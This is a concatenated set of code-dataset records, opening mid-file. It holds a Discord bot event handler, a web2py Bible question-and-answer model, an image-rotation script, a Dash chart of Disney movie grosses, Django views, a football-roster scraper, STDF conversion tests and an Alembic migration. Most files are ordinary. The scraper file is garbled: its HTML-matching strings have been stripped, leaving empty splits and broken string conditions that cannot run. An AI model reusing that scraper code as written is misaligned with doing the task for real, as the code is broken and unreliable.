suppress(Exception):\n            await self.safe_exc(filters.handle_invite, message)\n            await self.safe_exc(filters.anti_malware, message)\n            await self.safe_exc(filters.handle_paypal, message)\n            await self.safe_exc(filters.handle_youtube, message)\n            await self.safe_exc(filters.handle_twitch, message)\n            await self.safe_exc(filters.handle_twitter, message)\n\n\ndef setup(bot):\n    try:\n        bot.add_cog(Message(bot))\n        bot.logger.info(f'$GREENLoaded event $BLUEMessage!')\n    except Exception as e:\n        # errortb = ''.join(traceback.format_exception(type(e), e, e.__traceback__))\n        bot.logger.error(f'$REDError while loading event $BLUE\"Message\"', exc_info=e)\n","sub_path":"events/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"27372627","text":"# -*- coding: utf-8 
-*-\n\n#########################################################################\n## This scaffolding model makes your app work on Google App Engine too\n## File is released under public domain and you can use without limitations\n#########################################################################\n\n## if SSL/HTTPS is properly configured and you want all HTTP requests to\n## be redirected to HTTPS, uncomment the line below:\n# request.requires_https()\n\nif not request.env.web2py_runtime_gae:\n ## if NOT running on Google App Engine use SQLite or other DB\n db = DAL('sqlite://storage.sqlite',pool_size=1,check_reserved=['all'])\nelse:\n ## connect to Google BigTable (optional 'google:datastore://namespace')\n db = DAL('google:datastore')\n from google.appengine.api import memcache\n\n ## store sessions and tickets there\n session.connect(request, response, db=db)\n ## or store session in Memcache, Redis, etc.\n ## from gluon.contrib.memdb import MEMDB\n ## from google.appengine.api.memcache import Client\n ## session.connect(request, response, db = MEMDB(Client()))\n\n## by default give a view/generic.extension to all actions from localhost\n## none otherwise. a pattern can be 'controller/function.extension'\nresponse.generic_patterns = ['*'] if request.is_local else []\n## (optional) optimize handling of static files\n# response.optimize_css = 'concat,minify,inline'\n# response.optimize_js = 'concat,minify,inline'\n\n#########################################################################\n## Here is sample code if you need for\n## - email capabilities\n## - authentication (registration, login, logout, ... )\n## - authorization (role based authorization)\n## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)\n## - old style crud actions\n## (more options discussed in gluon/tools.py)\n#########################################################################\n\nfrom gluon.tools import Auth, Crud, Service, PluginManager, prettydate\nauth = Auth(db)\nauth.settings.extra_fields['auth_user']= [\n Field('myQuestion_num', 'integer', default=0, readable=False, writable=False),\n Field('myQuestion_list', 'list:integer', readable=False, writable=False),\n Field('myReply_num', 'integer', default=0, readable=False, writable=False),\n Field('myReply_list', 'list:integer', readable=False, writable=False)\n]\n\ncrud, service, plugins = Crud(db), Service(), PluginManager()\n\n## create all tables needed by auth if not custom tables\nauth.define_tables(username=False, signature=False)\n\n## configure email\nmail = auth.settings.mailer\nmail.settings.server = 'gae'\nmail.settings.sender = 'info.pbsn@gmail.com'\nmail.settings.login = 'username:password'\n\n## configure auth policy\nauth.settings.registration_requires_verification = False\nauth.settings.registration_requires_approval = False\nauth.settings.reset_password_requires_verification = True\n\n## if you need to use OpenID, Facebook, MySpace, Twitter, Linkedin, etc.\n## register with janrain.com, write your domain:api_key in private/janrain.key\nfrom gluon.contrib.login_methods.rpx_account import use_janrain\nuse_janrain(auth, filename='private/janrain.key')\n\n#########################################################################\n## Define your tables below (or better in another model file) for example\n##\n## >>> db.define_table('mytable',Field('myfield','string'))\n##\n## Fields can be 'string','text','password','integer','double','boolean'\n## 'date','time','datetime','blob','upload', 'reference TABLENAME'\n## There is an implicit 
'id integer autoincrement' field\n## Consult manual for more options, validators, etc.\n##\n## More API examples for controllers:\n##\n## >>> db.mytable.insert(myfield='value')\n## >>> rows=db(db.mytable.myfield=='value').select(db.mytable.ALL)\n## >>> for row in rows: print row.id, row.myfield\n#########################################################################\n\ndb.define_table('kjv',\n    Field('vno', 'integer', readable=False, writable=False),\n    Field('book', 'string', length=12, readable=False, writable=False),\n    Field('chapter', 'integer', readable=False, writable=False),\n    Field('verse', 'integer', readable=False, writable=False),\n    Field('text', 'text', requires=IS_LENGTH(1028), readable=False, writable=False))\n\ndb.define_table('question',\n    Field('vno', 'integer', readable=False, writable=False),\n    Field('body', 'text', requires=IS_NOT_EMPTY(), label='Please share your question about this verse (up to 2000 letters)'),\n    Field('posted_on', 'datetime', readable=False, writable=False),\n    Field('posted_by', 'reference auth_user', readable=False, writable=False),\n    Field(\"question_no\", 'integer', default=0, readable=False, writable=False),\n    Field(\"myQuestion_no\", 'integer', default=0, readable=False, writable=False),\n    Field(\"finish_flag\", 'integer', default=0, readable=False, writable=False),\n    Field(\"delete_flag\", 'integer', default=0, readable=False, writable=False))\n\ndb.define_table('reply',\n    Field('question', 'reference question', readable=False, writable=False),\n    Field('body', 'text', requires=IS_NOT_EMPTY(), label='Please share your reply to this question (up to 2000 letters)'),\n    Field('posted_on', 'datetime', readable=False, writable=False),\n    Field('posted_by', 'reference auth_user', readable=False, writable=False),\n    Field(\"myReply_no\", 'integer', default=0, readable=False, writable=False),\n    Field(\"finish_flag\", 'integer', default=0, readable=False, writable=False),\n    Field(\"delete_flag\", 'integer', default=0, readable=False, writable=False))\n\ndb.define_table('info',\n    Field(\"info_name\", 'string', readable=False, writable=False),\n    Field(\"value\", 'integer', default=0, readable=False, writable=False),\n    Field('list', 'list:integer', readable=False, writable=False))\n\na = db(db.info.info_name == \"total_question\").select()\nif len(a) == 0:\n    init_info = db.info.validate_and_insert(info_name=\"total_question\", value=0)\n\ndef name_of(user): return '%(first_name)s %(last_name)s' % user\n\n## after defining tables, record versioning (auditing) is enabled below\nauth.enable_record_versioning(db)\n\nKJV = db.kjv\nUser = db.auth_user\nQuestion = db.question\nReply = db.reply\nInfo = db.info\nme, a0, a1 = auth.user_id, request.args(0), request.args(1)\n\nbooks = {\n'Gen':'Genesis',\n'Exo':'Exodus',\n'Lev':'Leviticus',\n'Num':'Numbers',\n'Deu':'Deuteronomy',\n'Jos':'Joshua',\n'Jdg':'Judges',\n'Rut':'Ruth',\n'Sa1':'1 Samuel',\n'Sa2':'2 Samuel',\n'Kg1':'1 Kings',\n'Kg2':'2 Kings',\n'Ch1':'1 Chronicles',\n'Ch2':'2 Chronicles',\n'Ezr':'Ezra',\n'Neh':'Nehemiah',\n'Est':'Esther',\n'Job':'Job',\n'Psa':'Psalm',\n'Pro':'Proverbs',\n'Ecc':'Ecclesiastes',\n'Sol':'Song of Solomon',\n'Isa':'Isaiah',\n'Jer':'Jeremiah',\n'Lam':'Lamentations',\n'Eze':'Ezekiel',\n'Dan':'Daniel',\n'Hos':'Hosea',\n'Joe':'Joel',\n'Amo':'Amos',\n'Oba':'Obadiah',\n'Jon':'Jonah',\n'Mic':'Micah',\n'Nah':'Nahum',\n'Hab':'Habakkuk',\n'Zep':'Zephaniah',\n'Hag':'Haggai',\n'Zac':'Zechariah',\n'Mal':'Malachi 
',\n'Mat':'Matthew',\n'Mar':'Mark',\n'Luk':'Luke',\n'Joh':'John',\n'Act':'Acts',\n'Rom':'Romans',\n'Co1':'1 Corinthians',\n'Co2':'2 Corinthians',\n'Gal':'Galatians',\n'Eph':'Ephesians',\n'Phi':'Philippians',\n'Col':'Colossians',\n'Th1':'1 Thessalonians',\n'Th2':'2 Thessalonians',\n'Ti1':'1 Timothy',\n'Ti2':'2 Timothy',\n'Tit':'Titus',\n'Plm':'Philemon',\n'Heb':'Hebrews',\n'Jam':'James',\n'Pe1':'1 Peter',\n'Pe2':'2 Peter',\n'Jo1':'1 John',\n'Jo2':'2 John',\n'Jo3':'3 John',\n'Jde':'Jude',\n'Rev':'Revelation'}\n\nbooks2 = {\n'Genesis':'Gen',\n'Exodus':'Exo',\n'Leviticus':'Lev',\n'Numbers':'Num',\n'Deuteronomy':'Deu',\n'Joshua':'Jos',\n'Judges':'Jdg',\n'Ruth':'Rut',\n'1 Samuel':'Sa1',\n'2 Samuel':'Sa2',\n'1 Kings':'Kg1',\n'2 Kings':'Kg2',\n'1 Chronicles':'Ch1',\n'2 Chronicles':'Ch2',\n'Ezra':'Ezr',\n'Nehemiah':'Neh',\n'Esther':'Est',\n'Job':'Job',\n'Psalm':'Psa',\n'Proverbs':'Pro',\n'Ecclesiastes':'Ecc',\n'Song of Solomon':'Sol',\n'Isaiah':'Isa',\n'Jeremiah':'Jer',\n'Lamentations':'Lam',\n'Ezekiel':'Eze',\n'Daniel':'Dan',\n'Hosea':'Hos',\n'Joel':'Joe',\n'Amos':'Amo',\n'Obadiah':'Oba',\n'Jonah':'Jon',\n'Micah':'Mic',\n'Nahum':'Nah',\n'Habakkuk':'Hab',\n'Zephaniah':'Zep',\n'Haggai':'Hag',\n'Zechariah':'Zac',\n'Malachi ':'Mal',\n'Matthew':'Mat',\n'Mark':'Mar',\n'Luke':'Luk',\n'John':'Joh',\n'Acts':'Act',\n'Romans':'Rom',\n'1 Corinthians':'Co1',\n'2 Corinthians':'Co2',\n'Galatians':'Gal',\n'Ephesians':'Eph',\n'Philippians':'Phi',\n'Colossians':'Col',\n'1 Thessalonians':'Th1',\n'2 Thessalonians':'Th2',\n'1 Timothy':'Ti1',\n'2 Timothy':'Ti2',\n'Titus':'Tit',\n'Philemon':'Plm',\n'Hebrews':'Heb',\n'James':'Jam',\n'1 Peter':'Pe1',\n'2 Peter':'Pe2',\n'1 John':'Jo1',\n'2 John':'Jo2',\n'3 John':'Jo3',\n'Jude':'Jde',\n'Revelation':'Rev'}","sub_path":"original files/Python code/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":8633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"1427345","text":"from PIL import Image\r\n\r\n \r\n\r\n# Create an Image object from an Image\r\n\r\ncolorImage = Image.open(\"./test (16).jpg\")\r\n\r\n \r\n\r\n# Rotate it by 45 degrees\r\n\r\nrotated = colorImage.rotate(45)\r\n\r\ncolorImage.show()\r\n\r\nrotated.show()\r\n","sub_path":"rotate.py","file_name":"rotate.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"84587916","text":"# -*- coding: utf-8 -*-\n\nfrom dash import Dash\nfrom dash.dependencies import Input, Output, ALL, State, MATCH, ALLSMALLER, ClientsideFunction\nfrom Dashapps.Dash_fun import apply_layout_with_auth, load_object, save_object\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\n# https://github.com/plotly/dash-daq\n#https://dash-docs.herokuapp.com/dash-daq\nimport dash_daq as daq\nimport pandas as pd\nimport plotly.express as px\nimport plotly.graph_objs as go\nfrom Dashapps.Dash_base import warning_card, colors, cite_card, description_card, hint_card\nimport dash_table\nfrom datetime import datetime\nimport numpy as np\nfrom flask import request\nimport locale\n\nurl_base = '/dash/app17/' \n\ndata_sources = [\n \"https://www.kaggle.com/prateekmaj21/disney-movies\"\n]\n\ndata_licenses = [\n]\n\nsourced_date = \"05/17/2021\"\n\ncite_text = '\"All our dreams can come true — if we have the courage to pursue them.\"'\ncite_author = \"Walt Disney\"\ncite_link = \"https://en.wikipedia.org/wiki/Walt_Disney\"\ndescription_text = 
'''On this chart you see the Top 20 Disney movies ranked by their inflation-adjusted gross return in dollars. For me the order was quite surprising. Was it for you as well?'''\nhint_text = \"\"\ndf = pd.read_csv('app_data/processed/0017.csv')\ndf = df.sort_values('inflation_adjusted_gross', ascending=False)\ndf = df.head(20)\n\nfig = px.bar(df, y=\"movie_title\", x=\"inflation_adjusted_gross\", title=\"Top 20 Disney Movies with the highest gross return (inflation adjusted)\", labels={\"movie_title\": \"Movie Title\", \"inflation_adjusted_gross\": \"Gross Return (inf. adj.)\"})\n# Show the highest-grossing movie at the top of the horizontal bar chart.\nfig['layout']['yaxis']['autorange'] = \"reversed\"\nfig.update_layout(\n    legend=dict(\n        orientation=\"h\",\n        yanchor=\"bottom\",\n        y=1.02,\n        xanchor=\"right\",\n        x=1\n    ),\n    annotations=[\n        dict(\n            textangle=-30,\n            opacity=0.1,\n            font=dict(color=\"black\", size=35),\n            xref=\"paper\",\n            yref=\"paper\",\n            x=0.5,\n            y=0.5,\n            showarrow=False,\n            text=\"www.blackandwhitedata.com\",\n        )\n    ],\n    height=800,\n    margin={'r': 4, 'l': 10},\n    yaxis={'visible': True})\n\n\n# The Layout\nlayout = html.Div(style={'font-family': '\"Poppins\", sans-serif', 'backgroundColor': colors['background']}, children=[\n    html.H1(\n        children='Gross Return of Disney Movies',\n        style={\n            'textAlign': 'center',\n            'color': colors['text'],\n            'backgroundColor': colors['background']\n        }\n    ),\n    html.Div(children=description_card(description_text), style={\n        'textAlign': 'center',\n        'color': colors['text'],\n        'backgroundColor': colors['background']\n    }),\n    html.Div(children=cite_card(cite_text, cite_author, cite_link), style={\n        'textAlign': 'center',\n        'color': colors['text'],\n        'backgroundColor': colors['background']\n    }),\n    html.Br(),\n    dcc.Graph(\n        id='example-graph-2',\n        figure=fig\n    ),\n    html.Br(),\n    html.Div(children=hint_card(hint_text), style={\n        'textAlign': 'left',\n        'color': colors['text'],\n        'backgroundColor': colors['background']\n    }),\n    html.Br(),\n    html.Hr(className=\"my-2\"),\n    html.Br(),\n    html.Div(children=warning_card(data_sources, data_licenses, sourced_date), style={\n        'textAlign': 'left',\n        'color': colors['text'],\n        'backgroundColor': colors['background']\n    })\n])\n\ndef Add_Dash(server):\n    app = Dash(server=server, url_base_pathname=url_base, external_stylesheets=[dbc.themes.BOOTSTRAP], external_scripts=[\"https://cdn.plot.ly/plotly-locale-de-latest.js\"], meta_tags=[{\"name\": \"viewport\", \"content\": \"width=device-width, initial-scale=1\"}])\n\n    apply_layout_with_auth(app, layout)\n\n    return app.server","sub_path":"flask/Dashapps/entertain/Dash_App17.py","file_name":"Dash_App17.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"577133669","text":"from django import template\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import RequestContext\nfrom django.shortcuts import render, get_object_or_404, get_list_or_404, redirect, render_to_response\nfrom django.views.generic import View\nfrom django.views.generic.edit import FormView\nfrom .forms import *\nfrom .models import *\n\n\n# HTTP Error 404\n# def page_not_found(request):\n#     response = render_to_response(\n#         '404.html',\n#         context_instance=RequestContext(request)\n#     )\n#\n#     response.status_code = 404\n#\n#     return response\n\nclass About(FormView):\n    template_name = 'about.html'\n    form_class = ReistrationForm\n    success_url = \"/index\"\n\n
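    # Builds the sub-category tag lists for each top-level category plus the current user, shared by all pages.\n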
    def get_context_data(self, **kwargs):\n        context = super(About, self).get_context_data(**kwargs)\n        KasbTags = SubCategory.objects.filter(category__category_name=\"کسب وکارهای آنلاین\")\n        EtelaTags = SubCategory.objects.filter(category__category_name=\"اطلاع رسانی و محتوا\")\n        ShaTags = SubCategory.objects.filter(category__category_name=\"شخصی و شرکتی\")\n        KhaTags = SubCategory.objects.filter(category__category_name=\"خدمات آنلاین\")\n        Username = self.request.user\n        context['ETags'] = EtelaTags\n        context['KTags'] = KasbTags\n        context['STags'] = ShaTags\n        context['KhTags'] = KhaTags\n        context['username'] = Username\n        return context\n\n    def form_valid(self, form):\n        form.save()\n        return super(About, self).form_valid(form)\n\n\nclass Index(About):\n    template_name = 'index.html'\n    webcontext = Webpage.objects.all()\n\n    def get_context_data(self, **kwargs):\n        context = super(Index, self).get_context_data(**kwargs)\n        webcontext = Webpage.objects.all()\n        context['webcontext'] = webcontext\n        return context\n\n\nclass Categorys(About):\n    template_name = \"all-Category.html\"\n\n\nclass SiteMap(About):\n    template_name = \"siteMap.html\"\n\n\nclass Questions(About):\n    template_name = \"Questions.html\"\n\n\nclass Contact(About):\n    template_name = \"contact.html\"\n\n\nclass Vision(About):\n    template_name = \"Vision.html\"\n\n\ndef Contact2(request):\n    if request.method == \"GET\":\n        return HttpResponse(\"ERROR\")\n    name = request.POST.get('name')\n    email = request.POST.get('email')\n    message = request.POST.get('message')\n    # The Contact view class above shadows the model of the same name, so instantiating\n    # plain Contact here would build a view, not a record. Assuming .models defines a\n    # Contact model, re-import it under an alias before saving.\n    from .models import Contact as ContactModel\n    form = ContactModel(name=name, email=email, message=message)\n    contact = form.save()\n    return render(request, 'contact.html')\n\n\ndef ShowWebsites(request, web=\"1\"):\n    form = ReistrationForm(request.POST or None)\n    if form.is_valid():\n        form.save(commit=False)\n    webcontext = Webpage.objects.filter(Sub__id=web)\n    Sub = SubCategory.objects.filter(id=web)\n    KasbTags = SubCategory.objects.filter(category__category_name=\"کسب وکارهای آنلاین\")\n    EtelaTags = SubCategory.objects.filter(category__category_name=\"اطلاع رسانی و محتوا\")\n    ShaTags = SubCategory.objects.filter(category__category_name=\"شخصی و شرکتی\")\n    KhaTags = SubCategory.objects.filter(category__category_name=\"خدمات آنلاین\")\n    Username = request.user\n\n    context = {\"webcontext\": webcontext, 'form': form, \"ETags\": EtelaTags, 'KTags': KasbTags, 'STags': ShaTags,\n               'KhTags': KhaTags, \"username\": Username, \"sub\": Sub}\n    return render(request, 'showWebsites.html', context)\n\n\ndef Websitepage(request, webtitle=\"1\"):\n    form = ReistrationForm(request.POST or None)\n    if form.is_valid():\n        form.save(commit=False)\n    Username = request.user\n    webcontext = get_object_or_404(Webpage, id=webtitle)\n    Fescontext = Festival.objects.filter(webpage=webcontext.id)\n    KasbTags = SubCategory.objects.filter(category__category_name=\"کسب وکارهای آنلاین\")\n    EtelaTags = SubCategory.objects.filter(category__category_name=\"اطلاع رسانی و محتوا\")\n    ShaTags = SubCategory.objects.filter(category__category_name=\"شخصی و شرکتی\")\n    KhaTags = SubCategory.objects.filter(category__category_name=\"خدمات آنلاین\")\n    Tags = webcontext.Sub.all()\n    context = {\"webcontext\": webcontext, \"Fescontext\": Fescontext, \"Tags\": Tags, 'form': form, \"username\": Username,\n               \"ETags\": EtelaTags, 'KTags': KasbTags, 'STags': ShaTags,\n               'KhTags': KhaTags}\n    return render(request, 'Websitepage.html', 
context)\n","sub_path":"WebCastle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"444823673","text":"import urllib\nimport pandas as pd\n\nurl_team = 'https://www.fieldlevel.com/explore-teams/football/va?page='\nuser_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'\nheaders={'User-Agent':user_agent,}\n \nstorage_teams = pd.DataFrame(columns = {\"Name\", \"Region\", \"Type\"})\nstore = [] \nindex = 0;\n \nfor x in range(1,11): \n new_url = url_team + str(x)\n req = urllib.request.Request(new_url, None, headers)\n page = urllib.request.urlopen(req)\n data = page.read().decode('utf-8')\n for table in data.split(''):\n if \"'):\n if \"\",\"\").replace(\"<\",\"\").replace(\"/\",\"\").split(\"td\")\n no = item[0].replace('\"',\"\")\n name = item[2].split('\"')[2]\n pos = item[4]\n ht = item[6]\n wt = item[8]\n cla = item[10]\n home = item[12].split(\",\")[0]\n state = item[12].split(\",\")[1].replace(\" \",\"\")\n storage_uva.loc[index] = [no, name, pos, ht, wt, cla, home, state]\n index = index + 1\n \n \nwriter_uva = pd.ExcelWriter('uva.xlsx')\nstorage_uva.to_excel(writer_uva, 'Sheet1') \nwriter_uva.save()","sub_path":"data_scrape.py","file_name":"data_scrape.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"521799957","text":"# -*- coding: utf-8 -*-\nimport time\nimport h5py\nimport os\nimport os.path\n\nimport sys\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\n\nimport Semi_ATE.STDF.FAR as FAR\nimport Semi_ATE.STDF.ATR as ATR\nimport Semi_ATE.STDF.WIR as WIR\nimport Semi_ATE.STDF.MIR as MIR\nimport Semi_ATE.STDF.PCR as PCR\nimport Semi_ATE.STDF.MRR as MRR\nimport Semi_ATE.STDF.WRR as WRR\n\nfrom Metis.tools.stdf2ph5 import SHP\nfrom Metis.tools.stdf2csv import SCC\n\n\n# Tests are not finished yet. 
Only basic tests were written, not real ones.\n\ndef test_SHP():\n\n    make_stdf()\n\n    shp = SHP()\n    stdf_file = 'test.stdf'\n    out_folder = 'test_result'\n    shp.import_stdf_into_hdf5(stdf_file, out_folder)\n\n    hdf5_file = os.path.join(out_folder, '12345.h5')\n\n    f = h5py.File(hdf5_file, 'r')\n\n    # Group lookups via [] raise KeyError when missing, so membership checks are the clearer assertion.\n    assert 'backup' in f\n    assert 'raw_stdf_data' in f\n\n    backup_group = f['backup']\n    file = backup_group.get(stdf_file)\n    assert file is not None\n\n    raw_group = f['raw_stdf_data']\n    raw_file = raw_group.get(stdf_file)\n    assert raw_file is not None\n    atr = raw_file.get('ATR')\n    assert atr is not None\n    far = raw_file.get('FAR')\n    assert far is not None\n    mir = raw_file.get('MIR')\n    assert mir is not None\n    mrr = raw_file.get('MRR')\n    assert mrr is not None\n    pcr = raw_file.get('PCR')\n    assert pcr is not None\n\n    f.close()\n\n\ndef test_SCC():\n\n    make_stdf()\n\n    scc = SCC()\n    stdf_file = 'test.stdf'\n    out_folder = 'test_result'\n    scc.convert(stdf_file, out_folder, disable_progress=True)\n\n    csv_files = ['ATR.csv', 'FAR.csv', 'MIR.csv', 'MRR.csv', 'PCR.csv']\n\n    for csv_file in csv_files:\n        file = os.path.join(out_folder, csv_file)\n        assert os.path.getsize(file) > 0\n\n\ndef make_stdf():\n\n    with open('test.stdf', 'wb') as f:\n\n        far = FAR()\n\n        f.write(far.__repr__())\n\n        atr = ATR()\n        atr.set_value('MOD_TIM', 1609462861)\n        cmd_line = \"modification_script.sh -src /data/stdf/2020-01-01\"\n        atr.set_value('CMD_LINE', cmd_line)\n        f.write(atr.__repr__())\n\n        wir = WIR()\n        wir.set_value('HEAD_NUM', 1)\n        wir.set_value('SITE_GRP', 1)\n        wir.set_value('START_T', int(time.time()))\n        wir.set_value('WAFER_ID', \"WFR_NAS9999\")\n        f.write(wir.__repr__())\n\n        mir = MIR()\n        mir.set_value('SETUP_T', 1609462861)\n        mir.set_value('START_T', 1609462961)\n        mir.set_value('STAT_NUM', 131)\n        mir.set_value('MODE_COD', 'P')\n        mir.set_value('RTST_COD', ' ')\n        mir.set_value('PROT_COD', ' ')\n        mir.set_value('BURN_TIM', 65535)\n        mir.set_value('CMOD_COD', ' ')\n        mir.set_value('LOT_ID', '12345')\n        mir.set_value('PART_TYP', 'HAL3715')\n        mir.set_value('NODE_NAM', 'Node123')\n        mir.set_value('TSTR_TYP', 'SCT')\n        mir.set_value('JOB_NAM', 'TPHAL3715_HCT')\n        mir.set_value('JOB_REV', '4HEX2GIT')\n        mir.set_value('SBLOT_ID', 'NAS9999-1')\n        mir.set_value('OPER_NAM', 'op123')\n        mir.set_value('EXEC_TYP', 'SCTSW')\n        mir.set_value('EXEC_VER', 'GIT4HEXREV')\n        mir.set_value('TEST_COD', 'PROBING')\n        mir.set_value('TST_TEMP', '25C')\n        mir.set_value('USER_TXT', '')\n        mir.set_value('AUX_FILE', '')\n        mir.set_value('PKG_TYP', 'SOIC8')\n        mir.set_value('FAMLY_ID', 'HAL')\n        mir.set_value('DATE_COD', '1220')\n        mir.set_value('FACIL_ID', 'FR1')\n        mir.set_value('FLOOR_ID', 'PR1')\n        mir.set_value('PROC_ID', 'FIN135nm')\n        mir.set_value('OPER_FRQ', '1')\n        mir.set_value('SPEC_NAM', 'PR35')\n        mir.set_value('SPEC_VER', '1.1')\n        mir.set_value('FLOW_ID', 'STD')\n        mir.set_value('SETUP_ID', 'LB1111')\n        mir.set_value('DSGN_REV', 'AB12CH')\n        mir.set_value('ENG_ID', '')\n        mir.set_value('ROM_COD', 'RC12345')\n        mir.set_value('SERL_NUM', '1221001')\n        mir.set_value('SUPR_NAM', '')\n        f.write(mir.__repr__())\n\n        pcr = PCR()\n        pcr.set_value('HEAD_NUM', 1)\n        pcr.set_value('SITE_NUM', 1)\n        pcr.set_value('PART_CNT', 4294967295)\n        pcr.set_value('RTST_CNT', 123)\n        pcr.set_value('ABRT_CNT', 0)\n        pcr.set_value('GOOD_CNT', 4294967172)\n        pcr.set_value('FUNC_CNT', 0)\n        f.write(pcr.__repr__())\n\n        mrr = MRR()\n        mrr.set_value('FINISH_T', 1609462861)\n        mrr.set_value('DISP_COD', 'Z')\n        mrr.set_value('USR_DESC', 'NAS12345')\n        mrr.set_value('EXC_DESC', '12345')\n
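        # MRR (Master Results Record): lot-level summary of the test results.\n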
        f.write(mrr.__repr__())\n\n        wrr = WRR()\n        wrr.set_value('HEAD_NUM', 1)\n        wrr.set_value('SITE_GRP', 1)\n        wrr.set_value('FINISH_T', 1609462861)\n        wrr.set_value('PART_CNT', 11234567)\n        wrr.set_value('RTST_CNT', 123)\n        wrr.set_value('ABRT_CNT', 0)\n        wrr.set_value('GOOD_CNT', 11234444)\n        wrr.set_value('FUNC_CNT', 0)\n        wrr.set_value('WAFER_ID', 'WFR_NAS9999')\n        wrr.set_value('FABWF_ID', 'FABWFR_FR')\n        wrr.set_value('FRAME_ID', 'FRAME_213141')\n        wrr.set_value('MASK_ID', 'MASK_131212')\n        wrr.set_value('USR_DESC', 'USR_DESC')\n        wrr.set_value('EXC_DESC', 'DESC_NOTHING')\n        f.write(wrr.__repr__())\n","sub_path":"tests/test_stdf_convert.py","file_name":"test_stdf_convert.py","file_ext":"py","file_size_in_byte":5327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"241526010","text":"\"\"\"empty message\n\nRevision ID: bb93e9c2dc54\nRevises: 47a29340e82f\nCreate Date: 2016-05-26 23:35:07.793708\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'bb93e9c2dc54'\ndown_revision = '47a29340e82f'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n    ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('chats', sa.Column('name', sa.String(length=128), nullable=True))\n    # Name the constraint explicitly (uq_<table>_<column> convention); a None name\n    # cannot be referenced by op.drop_constraint() in downgrade().\n    op.create_unique_constraint('uq_chats_name', 'chats', ['name'])\n    ### end Alembic commands ###\n\n\ndef downgrade():\n    ### commands auto generated by Alembic - please adjust! ###\n    op.drop_constraint('uq_chats_name', 'chats', type_='unique')\n    op.drop_column('chats', 'name')\n    ### end Alembic commands ###\n","sub_path":"migrations/versions/bb93e9c2dc54_.py","file_name":"bb93e9c2dc54_.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}